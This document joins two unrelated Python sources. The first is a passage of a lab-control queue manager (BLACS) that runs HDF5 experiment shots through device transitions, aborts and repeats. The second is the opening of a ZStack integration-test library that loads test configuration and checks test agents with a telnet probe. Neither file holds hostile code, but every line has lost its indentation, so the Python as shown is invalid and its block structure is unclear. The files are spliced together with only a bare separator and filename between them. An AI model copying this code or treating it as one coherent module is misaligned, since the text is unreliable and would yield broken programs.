self._ui.queue_clear_button.clicked.connect(self._toggle_clear)
self._ui.actionAdd_to_queue.triggered.connect(self.on_add_shots_triggered)
self._ui.queue_add_button.setDefaultAction(self._ui.actionAdd_to_queue)
self._ui.queue_push_up.clicked.connect(self._move_up)
self._ui.queue_push_down.clicked.connect(self._move_down)
self._ui.queue_push_to_top.clicked.connect(self._move_top)
self._ui.queue_push_to_bottom.clicked.connect(self._move_bottom)
# Set the elision of the status labels:
elide_label(self._ui.queue_status, self._ui.queue_status_verticalLayout, Qt.ElideRight)
elide_label(self._ui.running_shot_name, self._ui.queue_status_verticalLayout, Qt.ElideLeft)
# Set up repeat mode button menu:
self.repeat_mode_menu = QMenu(self._ui)
self.action_repeat_all = QAction(QIcon(self.ICON_REPEAT), 'Repeat all', self._ui)
self.action_repeat_last = QAction(QIcon(self.ICON_REPEAT_LAST), 'Repeat last', self._ui)
self.action_repeat_all.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_ALL))
self.action_repeat_last.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_LAST))
self.repeat_mode_menu.addAction(self.action_repeat_all)
self.repeat_mode_menu.addAction(self.action_repeat_last)
self._ui.repeat_mode_select_button.setMenu(self.repeat_mode_menu)
# The button already has an arrow indicating a menu, don't draw another one:
self._ui.repeat_mode_select_button.setStyleSheet("QToolButton::menu-indicator{width: 0;}")
self.manager = threading.Thread(target = self.manage)
self.manager.daemon=True
self.manager.start()
def _create_headers(self):
self._model.setHorizontalHeaderItem(FILEPATH_COLUMN, QStandardItem('Filepath'))
def get_save_data(self):
# get list of files in the queue
file_list = []
for i in range(self._model.rowCount()):
file_list.append(self._model.item(i).text())
# get button states
return {'manager_paused':self.manager_paused,
'manager_repeat':self.manager_repeat,
'manager_repeat_mode':self.manager_repeat_mode,
'files_queued':file_list,
'last_opened_shots_folder': self.last_opened_shots_folder
}
def restore_save_data(self,data):
if 'manager_paused' in data:
self.manager_paused = data['manager_paused']
if 'manager_repeat' in data:
self.manager_repeat = data['manager_repeat']
if 'manager_repeat_mode' in data:
self.manager_repeat_mode = data['manager_repeat_mode']
if 'files_queued' in data:
file_list = list(data['files_queued'])
self._model.clear()
self._create_headers()
for file in file_list:
self.process_request(str(file))
if 'last_opened_shots_folder' in data:
self.last_opened_shots_folder = data['last_opened_shots_folder']
@property
@inmain_decorator(True)
def manager_running(self):
return self._manager_running
@manager_running.setter
@inmain_decorator(True)
def manager_running(self,value):
value = bool(value)
self._manager_running = value
def _toggle_pause(self,checked):
self.manager_paused = checked
def _toggle_clear(self):
self._model.clear()
self._create_headers()
@property
@inmain_decorator(True)
def manager_paused(self):
return self._manager_paused
@manager_paused.setter
@inmain_decorator(True)
def manager_paused(self,value):
value = bool(value)
self._manager_paused = value
if value != self._ui.queue_pause_button.isChecked():
self._ui.queue_pause_button.setChecked(value)
def _toggle_repeat(self,checked):
self.manager_repeat = checked
@property
@inmain_decorator(True)
def manager_repeat(self):
return self._manager_repeat
@manager_repeat.setter
@inmain_decorator(True)
def manager_repeat(self,value):
value = bool(value)
self._manager_repeat = value
if value != self._ui.queue_repeat_button.isChecked():
self._ui.queue_repeat_button.setChecked(value)
@property
@inmain_decorator(True)
def manager_repeat_mode(self):
return self._manager_repeat_mode
@manager_repeat_mode.setter
@inmain_decorator(True)
def manager_repeat_mode(self, value):
assert value in [self.REPEAT_LAST, self.REPEAT_ALL]
self._manager_repeat_mode = value
button = self._ui.queue_repeat_button
if value == self.REPEAT_ALL:
button.setIcon(QIcon(self.ICON_REPEAT))
elif value == self.REPEAT_LAST:
button.setIcon(QIcon(self.ICON_REPEAT_LAST))
def on_add_shots_triggered(self):
shot_files = QFileDialog.getOpenFileNames(self._ui, 'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if isinstance(shot_files, tuple):
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(str(shot_file)) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
if filepath.endswith('.h5'):
self.process_request(str(filepath))
def _delete_selected_items(self):
index_list = self._ui.treeview.selectedIndexes()
while index_list:
self._model.takeRow(index_list[0].row())
index_list = self._ui.treeview.selectedIndexes()
def _move_up(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
def _move_down(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
def _move_top(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
def _move_bottom(self):
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
@inmain_decorator(True)
def append(self, h5files):
for file in h5files:
item = QStandardItem(file)
item.setToolTip(file)
self._model.appendRow(item)
@inmain_decorator(True)
def prepend(self,h5file):
if not self.is_in_queue(h5file):
self._model.insertRow(0,QStandardItem(h5file))
def process_request(self,h5_filepath):
# check connection table
try:
new_conn = ConnectionTable(h5_filepath, logging_prefix='BLACS')
except Exception:
return "H5 file not accessible to Control PC\n"
result,error = inmain(self.BLACS.connection_table.compare_to,new_conn)
if result:
# Has this run file been run already?
with h5py.File(h5_filepath, 'r') as h5_file:
if 'data' in h5_file['/']:
rerun = True
else:
rerun = False
if rerun or self.is_in_queue(h5_filepath):
self._logger.debug('Run file has already been run! Creating a fresh copy to rerun')
new_h5_filepath, repeat_number = self.new_rep_name(h5_filepath)
# Keep counting up until we get a filename that isn't in the filesystem:
while os.path.exists(new_h5_filepath):
new_h5_filepath, repeat_number = self.new_rep_name(new_h5_filepath)
success = self.clean_h5_file(h5_filepath, new_h5_filepath, repeat_number=repeat_number)
if not success:
return 'Cannot create a re run of this experiment. Is it a valid run file?'
self.append([new_h5_filepath])
message = "Experiment added successfully: experiment to be re-run\n"
else:
self.append([h5_filepath])
message = "Experiment added successfully\n"
if self.manager_paused:
message += "Warning: Queue is currently paused\n"
if not self.manager_running:
message = "Error: Queue is not running\n"
return message
else:
# TODO: Parse and display the contents of "error" in a more human readable format for analysis of what is wrong!
message = ("Connection table of your file is not a subset of the experimental control apparatus.\n"
"You may have:\n"
" Submitted your file to the wrong control PC\n"
" Added new channels to your h5 file, without rewiring the experiment and updating the control PC\n"
" Renamed a channel at the top of your script\n"
" Submitted an old file, and the experiment has since been rewired\n"
"\n"
"Please verify your experiment script matches the current experiment configuration, and try again\n"
"The error was %s\n"%error)
return message
def new_rep_name(self, h5_filepath):
basename, ext = os.path.splitext(h5_filepath)
if '_rep' in basename and ext == '.h5':
reps = basename.split('_rep')[-1]
try:
reps = int(reps)
except ValueError:
# not a rep
pass
else:
return ''.join(basename.split('_rep')[:-1]) + '_rep%05d.h5' % (reps + 1), reps + 1
return basename + '_rep%05d.h5' % 1, 1
def clean_h5_file(self, h5file, new_h5_file, repeat_number=0):
try:
with h5py.File(h5file, 'r') as old_file:
with h5py.File(new_h5_file, 'w') as new_file:
groups_to_copy = [
'devices',
'calibrations',
'script',
'globals',
'connection table',
'labscriptlib',
'waits',
'time_markers',
'shot_properties',
]
for group in groups_to_copy:
if group in old_file:
new_file.copy(old_file[group], group)
for name in old_file.attrs:
new_file.attrs[name] = old_file.attrs[name]
new_file.attrs['run repeat'] = repeat_number
except Exception:
# raise
self._logger.exception('Clean H5 File Error.')
return False
return True
@inmain_decorator(wait_for_return=True)
def is_in_queue(self,path):
item = self._model.findItems(path,column=FILEPATH_COLUMN)
if item:
return True
else:
return False
@inmain_decorator(wait_for_return=True)
def set_status(self, queue_status, shot_filepath=None):
self._ui.queue_status.setText(str(queue_status))
if shot_filepath is not None:
self._ui.running_shot_name.setText('<b>%s</b>'% str(os.path.basename(shot_filepath)))
else:
self._ui.running_shot_name.setText('')
@inmain_decorator(wait_for_return=True)
def get_status(self):
return self._ui.queue_status.text()
@inmain_decorator(wait_for_return=True)
def get_next_file(self):
return str(self._model.takeRow(0)[0].text())
@inmain_decorator(wait_for_return=True)
def transition_device_to_buffered(self, name, transition_list, h5file, restart_receiver):
tab = self.BLACS.tablist[name]
if self.get_device_error_state(name,self.BLACS.tablist):
return False
tab.connect_restart_receiver(restart_receiver)
tab.transition_to_buffered(h5file,self.current_queue)
transition_list[name] = tab
return True
@inmain_decorator(wait_for_return=True)
def get_device_error_state(self,name,device_list):
return device_list[name].error_message
def manage(self):
logger = logging.getLogger('BLACS.queue_manager.thread')
process_tree.zlock_client.set_thread_name('queue_manager')
# While the program is running!
logger.info('starting')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
# This name stores the queue currently being used to
# communicate with tabs, so that abort signals can be put
# to it when those tabs never respond and are restarted by
# the user.
self.current_queue = queue.Queue()
#TODO: put in general configuration
timeout_limit = 300 #seconds
self.set_status("Idle")
while self.manager_running:
# If the pause button is pushed in, sleep
if self.manager_paused:
if self.get_status() == "Idle":
logger.info('Paused')
self.set_status("Queue paused")
time.sleep(1)
continue
# Get the top file
try:
path = self.get_next_file()
self.set_status('Preparing shot...', path)
logger.info('Got a file: %s'%path)
except Exception:
# If no files, sleep for 1s,
self.set_status("Idle")
time.sleep(1)
continue
devices_in_use = {}
transition_list = {}
self.current_queue = queue.Queue()
# Function to be run when abort button is clicked
def abort_function():
try:
# Set device name to "Queue Manager" which will never be a labscript device name
# as it is not a valid python variable name (has a space in it!)
self.current_queue.put(['Queue Manager', 'abort'])
except Exception:
logger.exception('Could not send abort message to the queue manager')
def restart_function(device_name):
try:
self.current_queue.put([device_name, 'restart'])
except Exception:
logger.exception('Could not send restart message to the queue manager for device %s'%device_name)
##########################################################################################################################################
# transition to buffered #
##########################################################################################################################################
try:
# A Queue for event-based notification when the tabs have
# completed transitioning to buffered:
timed_out = False
error_condition = False
abort = False
restarted = False
self.set_status("Transitioning to buffered...", path)
# Enable abort button, and link in current_queue:
inmain(self._ui.queue_abort_button.clicked.connect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,True)
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('pre_transition_to_buffered'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
start_time = time.time()
with h5py.File(path, 'r') as hdf5_file:
devices_in_use = {}
start_order = {}
stop_order = {}
for name in hdf5_file['devices']:
device_properties = labscript_utils.properties.get(
hdf5_file, name, 'device_properties'
)
devices_in_use[name] = self.BLACS.tablist[name]
start_order[name] = device_properties.get('start_order', None)
stop_order[name] = device_properties.get('stop_order', None)
# Sort the devices into groups based on their start_order and stop_order
start_groups = defaultdict(set)
stop_groups = defaultdict(set)
for name in devices_in_use:
start_groups[start_order[name]].add(name)
stop_groups[stop_order[name]].add(name)
while (transition_list or start_groups) and not error_condition:
if not transition_list:
# Ready to transition the next group:
for name in start_groups.pop(min(start_groups)):
try:
# Connect restart signal from tabs to current_queue and transition the device to buffered mode
success = self.transition_device_to_buffered(name,transition_list,path,restart_function)
if not success:
logger.error('%s has an error condition, aborting run' % name)
error_condition = True
break
except Exception:
logger.exception('Exception while transitioning %s to buffered mode.'%(name))
error_condition = True
break
if error_condition:
break
try:
# Wait for a device to transtition_to_buffered:
logger.debug('Waiting for the following devices to finish transitioning to buffered mode: %s'%str(transition_list))
device_name, result = self.current_queue.get(timeout=2)
#Handle abort button signal
if device_name == 'Queue Manager' and result == 'abort':
# we should abort the run
logger.info('abort signal received from GUI')
abort = True
break
if result == 'fail':
logger.info('abort signal received during transition to buffered of %s' % device_name)
error_condition = True
break
elif result == 'restart':
logger.info('Device %s was restarted, aborting shot.'%device_name)
restarted = True
break
logger.debug('%s finished transitioning to buffered mode' % device_name)
# The tab says it's done, but does it have an error condition?
if self.get_device_error_state(device_name,transition_list):
logger.error('%s has an error condition, aborting run' % device_name)
error_condition = True
break
del transition_list[device_name]
except queue.Empty:
# It's been 2 seconds without a device finishing
# transitioning to buffered. Is there an error?
for name in transition_list:
if self.get_device_error_state(name,transition_list):
error_condition = True
break
if error_condition:
break
# Has programming timed out?
if time.time() - start_time > timeout_limit:
logger.error('Transitioning to buffered mode timed out')
timed_out = True
break
# Handle if we broke out of loop due to timeout or error:
if timed_out or error_condition or abort or restarted:
# Pause the queue, re add the path to the top of the queue, and set a status message!
# only if we aren't responding to an abort click
if not abort:
self.manager_paused = True
self.prepend(path)
if timed_out:
self.set_status("Programming timed out\nQueue paused")
elif abort:
self.set_status("Aborted")
elif restarted:
self.set_status("Device restarted in transition to\nbuffered. Aborted. Queue paused.")
else:
self.set_status("Device(s) in error state\nQueue Paused")
# Abort the run for all devices in use:
# need to recreate the queue here because we don't want to hear from devices that are still transitioning to buffered mode
self.current_queue = queue.Queue()
for tab in devices_in_use.values():
# We call abort buffered here, because if each tab is either in mode=BUFFERED or transition_to_buffered failed in which case
# it should have called abort_transition_to_buffered itself and returned to manual mode
# Since abort buffered will only run in mode=BUFFERED, and the state is not queued indefinitely (aka it is deleted if we are not in mode=BUFFERED)
# this is the correct method call to make for either case
tab.abort_buffered(self.current_queue)
# We don't need to check the results of this function call because it will either be successful, or raise a visible error in the tab.
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# disconnect abort button and disable
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE! #
##########################################################################################################################################
# Get front panel data, but don't save it to the h5 file until the experiment ends:
states,tab_positions,window_data,plugin_data = self.BLACS.front_panel_settings.get_save_data()
self.set_status("Running (program time: %.3fs)..."%(time.time() - start_time), path)
# A Queue for event-based notification of when the experiment has finished.
experiment_finished_queue = queue.Queue()
logger.debug('About to start the master pseudoclock')
run_time = datetime.datetime.now()
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_starting'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
#TODO: fix potential race condition if BLACS is closing when this line executes?
self.BLACS.tablist[self.master_pseudoclock].start_run(experiment_finished_queue)
# Wait for notification of the end of run:
abort = False
restarted = False
done = False
while not (abort or restarted or done):
try:
done = experiment_finished_queue.get(timeout=0.5) == 'done'
except queue.Empty:
pass
try:
# Poll self.current_queue for abort signal from button or device restart
device_name, result = self.current_queue.get_nowait()
if (device_name == 'Queue Manager' and result == 'abort'):
abort = True
if result == 'restart':
restarted = True
# Check for error states in tabs
for device_name, tab in devices_in_use.items():
if self.get_device_error_state(device_name,devices_in_use):
restarted = True
except queue.Empty:
pass
if abort or restarted:
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# Disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
if restarted:
self.manager_paused = True
self.prepend(path)
self.set_status("Device restarted during run.\nAborted. Queue paused")
elif abort:
self.set_status("Aborted")
if abort or restarted:
# after disabling the abort button, we now start a new iteration
continue
logger.info('Run complete')
self.set_status("Saving data...", path)
# End try/except block here
except Exception:
logger.exception("Error in queue manager execution. Queue paused.")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
# clean the h5 file:
temp_path = tempfilename()
self.clean_h5_file(path, temp_path, repeat_number=repeat_number)
try:
shutil.move(temp_path, path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move(temp_path, path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode
self.current_queue = queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED or tab.mode == MODE_TRANSITION_TO_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
self.set_status("Error in queue manager\nQueue paused")
# disconnect and disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE OVER! #
##########################################################################################################################################
finally:
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_over'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Transition to manual #
##########################################################################################################################################
# start new try/except block here
try:
with h5py.File(path,'r+') as hdf5_file:
self.BLACS.front_panel_settings.store_front_panel_in_h5(hdf5_file,states,tab_positions,window_data,plugin_data,save_conn_table=False, save_queue_data=False)
data_group = hdf5_file['/'].create_group('data')
# stamp with the run time of the experiment
hdf5_file.attrs['run time'] = run_time.strftime('%Y%m%dT%H%M%S.%f')
error_condition = False
response_list = {}
# Keep transitioning tabs to manual mode and waiting on them until they
# are all done or have all errored/restarted/failed. If one fails, we
# still have to transition the rest to manual mode:
while stop_groups:
transition_list = {}
# Transition the next group to manual mode:
for name in stop_groups.pop(min(stop_groups)):
tab = devices_in_use[name]
try:
tab.transition_to_manual(self.current_queue)
transition_list[name] = tab
except Exception:
logger.exception('Exception while transitioning %s to manual mode.'%(name))
error_condition = True
# Wait for their responses:
while transition_list:
logger.info('Waiting for the following devices to finish transitioning to manual mode: %s'%str(transition_list))
try:
name, result = self.current_queue.get(2)
if name == 'Queue Manager' and result == 'abort':
# Ignore any abort signals left in the queue, it is too
# late to abort in any case:
continue
except queue.Empty:
# 2 seconds without a device transitioning to manual mode.
# Is there an error:
for name in transition_list.copy():
if self.get_device_error_state(name, transition_list):
error_condition = True
logger.debug('%s is in an error state' % name)
del transition_list[name]
continue
response_list[name] = result
if result == 'fail':
error_condition = True
logger.debug('%s failed to transition to manual' % name)
elif result == 'restart':
error_condition = True
logger.debug('%s restarted during transition to manual' % name)
elif self.get_device_error_state(name, devices_in_use):
error_condition = True
logger.debug('%s is in an error state' % name)
else:
logger.debug('%s finished transitioning to manual mode' % name)
# Once device has transitioned_to_manual, disconnect restart
# signal:
tab = devices_in_use[name]
inmain(tab.disconnect_restart_receiver, restart_function)
del transition_list[name]
if error_condition:
self.set_status("Error in transtion to manual\nQueue Paused")
except Exception:
error_condition = True
logger.exception("Error in queue manager execution. Queue paused.")
self.set_status("Error in queue manager\nQueue paused")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
if error_condition:
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
# clean the h5 file:
temp_path = tempfilename()
self.clean_h5_file(path, temp_path, repeat_number=repeat_number)
try:
shutil.move(temp_path, path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move(temp_path, path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
continue
##########################################################################################################################################
# Analysis Submission #
##########################################################################################################################################
logger.info('All devices are back in static mode.')
# check for analysis Filters in Plugins
send_to_analysis = True
for callback in plugins.get_callbacks('analysis_cancel_send'):
try:
if callback(path):
send_to_analysis = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
# Submit to the analysis server
if send_to_analysis:
self.BLACS.analysis_submission.get_queue().put(['file', path])
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('shot_complete'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Repeat Experiment? #
##########################################################################################################################################
# check for repeat Filters in Plugins
repeat_shot = self.manager_repeat
for callback in plugins.get_callbacks('shot_ignore_repeat'):
try:
if callback(path):
repeat_shot = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
if repeat_shot:
if ((self.manager_repeat_mode == self.REPEAT_ALL) or
(self.manager_repeat_mode == self.REPEAT_LAST and inmain(self._model.rowCount) == 0)):
# Resubmit job to the bottom of the queue:
try:
message = self.process_request(path)
except Exception:
# TODO: make this error popup for the user
self._logger.exception('Failed to copy h5_file (%s) for repeat run'%s)
logger.info(message)
self.set_status("Idle")
logger.info('Stopping')
|
test_lib.py
|
'''
Create a common test libs for all integration test stubs.
@author: Youyk
'''
import time
import os
import string
import random
import traceback
import sys
import threading
import uuid
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as ts_header
import zstackwoodpecker.action_select as action_select
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.deploy_operations as dep_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.operations.volume_operations as vol_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.tag_operations as tag_ops
import zstackwoodpecker.operations.node_operations as node_ops
import zstackwoodpecker.operations.config_operations as conf_ops
import zstackwoodpecker.operations.console_operations as cons_ops
import zstackwoodpecker.operations.license_operations as lic_ops
import zstackwoodpecker.header.vm as vm_header
import zstackwoodpecker.header.volume as vol_header
import zstackwoodpecker.header.image as image_header
import apibinding.api as api
import zstacklib.utils.http as http
import zstacklib.utils.jsonobject as jsonobject
import zstacklib.utils.linux as linux
import zstacklib.utils.lock as lock
import zstacklib.utils.shell as shell
import zstacklib.utils.ssh as ssh
import zstacklib.utils.filedb as filedb
import zstacklib.utils.xmlobject as xmlobject
import zstacklib.utils.debug as debug
import apibinding.inventory as inventory
import zstacktestagent.plugins.vm as vm_plugin
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
debug.install_runtime_tracedumper()
test_stage = ts_header.TestStage
TestAction = ts_header.TestAction
SgRule = ts_header.SgRule
Port = ts_header.Port
WOODPECKER_MOUNT_POINT = '/tmp/zstack/mnt'
SSH_TIMEOUT = 60
class FakeObject(object):
'''
Use to print warning message
'''
def __getitem__(self, name):
raise test_util.TestError("WOODPECKER_TEST_CONFIG_FILE is NOT set, which will be used in ZStack test. It is usually set by zstack-woodpecker when executing integration test or exporting environment parameter when executing python command manually(e.g. WOODPECKER_TEST_CONFIG_FILE=/WOODPECKER_TEST_PATH/virtualrouter/test-config.xml). ")
def __getattr__(self, name):
self.__getitem__(name)
scenario_config_path = os.environ.get('WOODPECKER_SCENARIO_CONFIG_FILE')
if scenario_config_path != None and scenario_config_path != "":
scenario_config_obj = test_util.TestScenario(scenario_config_path)
#Special config in test-config.xml, such like test ping target.
scenario_config = scenario_config_obj.get_test_config()
#All configs in deploy.xml.
all_scenario_config = scenario_config_obj.get_scenario_config()
#Detailed zstack deployment information, including zones/cluster/hosts...
deploy_scenario_config = all_scenario_config.deployerConfig
#setup_scenario_plan = setup_actions.Plan(all_scenario_config)
else:
scenario_config = None
all_scenario_config = None
scenario_file_path = os.environ.get('WOODPECKER_SCENARIO_FILE')
if scenario_file_path != None and scenario_file_path != "":
scenario_file = scenario_file_path
else:
scenario_file = None
scenario_destroy_path = os.environ.get('WOODPECKER_SCENARIO_DESTROY')
if scenario_destroy_path != None and scenario_destroy_path != "":
scenario_destroy = scenario_destroy_path
else:
scenario_destroy = None
#Following lines were not expected to be changed.
#---------------
test_config_path = os.environ.get('WOODPECKER_TEST_CONFIG_FILE')
if test_config_path:
test_config_obj = test_util.TestConfig(test_config_path)
#Special config in test-config.xml, such like test ping target.
test_config = test_config_obj.get_test_config()
#All configs in deploy.xml.
all_config = test_config_obj.get_deploy_config()
#Detailed zstack deployment information, including zones/cluster/hosts...
deploy_config = all_config.deployerConfig
setup_plan = setup_actions.Plan(all_config, all_scenario_config, scenario_file)
test_config_obj.expose_config_variable()
#Since ZStack management server might be not the same machine of test
#machine, so it needs to set management server ip for apibinding/api.py,
#before calling ZStack APIs.
if not os.environ.get('ZSTACK_BUILT_IN_HTTP_SERVER_IP'):
os.environ['ZSTACK_BUILT_IN_HTTP_SERVER_IP'] = xmlobject.safe_list(deploy_config.nodes.node)[0].ip_
else:
test_config_obj = FakeObject()
test_config = FakeObject()
all_config = FakeObject()
deploy_config = FakeObject()
setup_plan = FakeObject()
#---------------
#TestHarness will define how testing will try to connect VM.
#Default is through Host. If the host is VMWare, it should be changed to VR.
#---------------
TestHarnessVR = 'VR'
TestHarnessHost = 'HOST'
TestHarness = TestHarnessHost
#---------------
#Test Host Default Ethernet device. It is for zstack management device.
#Please change it to right one.
#---------------
HostDefaultEth = 'eth0'
#---------------
#File name for save host L2 IP dictionary. It doesn't need to be changed.
#It will be saved in /var/lib/zstack/filedb/host_l2_ip.db
HostL2IpDb = 'host_l2_ip.db'
def lib_install_testagent_to_host(host, username = None, password = None):
host_pub_ip = host.managementIp
try:
shell.call('echo "quit" | telnet %s 9393|grep "Escape character"' % host_pub_ip)
#shell.call('nc -w1 %s 9393' % host_pub_ip)
test_util.test_logger('Testagent is running on Host: %s . Skip testagent installation.' % host.name)
except:
test_host = test_util.HostOption()
test_host.managementIp = host_pub_ip
if not username:
test_host.username = os.environ.get('hostUsername')
else:
test_host.username = username
if not password:
test_host.password = os.environ.get('hostPassword')
else:
test_host.password = password
test_host.uuid = host.uuid
test_util.test_logger('Testagent is not running on [host:] %s . Will install Testagent.\n' % host.name)
setup_plan.deploy_test_agent(test_host)
def lib_check_system_cmd(command):
'''
Check if system has command.
'''
try:
shell.call('which %s' % command)
test_util.test_logger('find command: %s on system' % command)
return True
except:
test_util.test_warn('not find command: %s on system' % command)
return False
def lib_check_testagent_status(target_ip):
'''
Check if test agent is running on target
'''
return lib_network_check(target_ip, '9393')
def lib_install_testagent_to_vr_with_vr_vm(vr_vm):
vr = test_util.HostOption()
test_util.test_logger("Begin to install testagent to VR: %s" % vr_vm.uuid)
vr.managementIp = lib_find_vr_mgmt_ip(vr_vm)
lib_check_system_cmd('telnet')
#lib_check_system_cmd('nc')
try:
shell.call('echo "quit" | telnet %s 9393|grep "Escape character"' % vr.managementIp)
#shell.call('nc -w1 %s 9393' % vr.managementIp)
test_util.test_logger('Testagent is running on VR: %s . Skip testagent installation.' % vr.managementIp)
except:
vr.username = lib_get_vr_image_username(vr_vm)
vr.password = lib_get_vr_image_password(vr_vm)
vr.uuid = vr_vm.uuid
vr.machine_id = vr_vm.uuid
test_util.test_logger('Testagent is not running on [VR:] %s . Will install Testagent.\n' % vr.managementIp)
setup_plan.deploy_test_agent(vr)
def lib_install_testagent_to_vr(vm):
'''
Install testagent to Vm's VR.
vm: it is not vr_vm. It is the vm behind of target VR. If want to directly
install to vr_vm. Please use lib_install_testagent_to_vr_with_vr_vm(vr_vm)
'''
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
return True
def lib_get_ceph_info(monUrls):
'''
